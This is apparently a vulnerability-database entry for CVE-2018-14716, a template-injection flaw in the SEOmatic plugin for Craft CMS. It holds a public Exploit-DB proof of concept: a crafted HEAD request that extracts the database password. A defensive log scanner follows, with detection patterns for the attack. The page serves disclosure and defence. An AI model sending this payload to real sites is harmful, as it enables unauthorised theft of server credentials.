CVE-2018-14716
unknown
CVSS v3
—
CVSS v4 NEW
—
VIR risk
1.0
Description
SEOmatic plugin for Craft CMS SSTI Vulnerability
Predictions
Exploit likelihood
30%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
# Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
# Date: 2018-07-20
# Software Link: https://github.com/nystudio107/craft-seomatic
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
# CVE: CVE-2018-14716
# Category: webapps
# 1. Description
# An unauthenticated user can trigger the Twig template engine by injecting
# code into the URI as described in this article:
# http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/
# This can be leveraged to perform arbitrary calls against the template engine and the CMS.
# The output will be reflected within the Link header of the response.
# 2. Proof of Concept
# The injection can be performed against any part of the URL path. However as the framework is replacing
# control characters with HTML entities (e.g. ' ==> ') it is not possible to directly address methods with
# parameter values. Therefore it is required to bypass the filter by invoking functions such as craft.request.getUserAgent()
# and store the parameter values in the User-Agent header. In combination with Twig's slice() filter it is then possible
# to extract sensitive information by utilizing the craft.config.get() method:
# Request:
HEAD /db-password:%20%7b%25%20set%20dummy%20=%20craft.request.getUserAgent()|slice(0,8)%25%7d%7b%25%20set%20dummy2%20=%20craft.request.getUserAgent()|slice(9,2)%25%7d%7b%7bcraft.config.get(dummy,dummy2)%7d%7d HTTP/1.1
Host: craft-installation
User-Agent: password db
# Response:
HTTP/1.1 404 Not Found
Server: nginx
…
Link: <db-password: SECRET>; rel='canonical'
…
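For defenders, an added example (not part of the Exploit-DB entry or the SEOmatic project) that scans access-log lines for the indicators the PoC above leaves behind: URL-encoded Twig delimiters and craft.* object calls in the request path, and a User-Agent that is not a browser token next to a getUserAgent() call. The combined log format, field names and the browser-token check are assumptions; the log lines are constructed.

```python
import re
from urllib.parse import unquote
# Twig delimiters and the Craft objects the PoC chains in the request path.
TWIG_DELIMS = re.compile(r"\{\{|\}\}|\{%|%\}")
CRAFT_CALLS = re.compile(r"\bcraft\.(request|config|app)\b", re.IGNORECASE)

# Assumed combined log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def decode_path(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify_request(path: str, user_agent: str) -> dict:
    """Return the indicators found in one request; an empty dict means nothing suspicious."""
    decoded = decode_path(path)
    findings = {}
    if TWIG_DELIMS.search(decoded):
        findings["twig_delimiters"] = True
    if CRAFT_CALLS.search(decoded):
        findings["craft_object_call"] = True
    # The PoC pulls its parameters out of the User-Agent via getUserAgent()|slice,
    # so a template in the path plus a non-browser UA is a strong combined signal.
    if "getUserAgent" in decoded and not user_agent.startswith(("Mozilla", "curl")):
        findings["ua_smuggled_parameter"] = user_agent
    return findings

def scan_log(lines):
    """Yield (ip, path, findings) for every log line carrying an SSTI indicator."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = classify_request(m["path"], m["ua"])
            if findings:
                yield m["ip"], m["path"], findings

# Constructed sample lines: one benign request and one carrying the PoC payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jul/2018:10:00:00 +0000] "GET /blog/hello HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Jul/2018:10:00:01 +0000] "HEAD /db-password:%20%7b%25%20set%20dummy%20=%20craft.request.getUserAgent()|slice(0,8)%25%7d'
    '%7b%7bcraft.config.get(dummy,dummy2)%7d%7d HTTP/1.1" 404 0 "-" "password db"',
]
```

Running `list(scan_log(SAMPLE_LOG))` reports only the second line, with all three indicators set.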
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Packagist | nystudio107/craft-seomatic | <3.1.4 | 3.1.4 |
References
- https://nvd.nist.gov/vuln/detail/CVE-2018-14716
- https://github.com/nystudio107/craft-seomatic/commit/1e7d1d084ac3a89e7ec70620f2749110508d1ce1
- https://github.com/nystudio107/craft-seomatic
- https://github.com/nystudio107/craft-seomatic/releases/tag/3.1.4
- https://twitter.com/nystudio107/status/1021847835418009605
- https://twitter.com/nystudio107/status/1021855169515057152
- https://www.exploit-db.com/exploits/45108
- http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic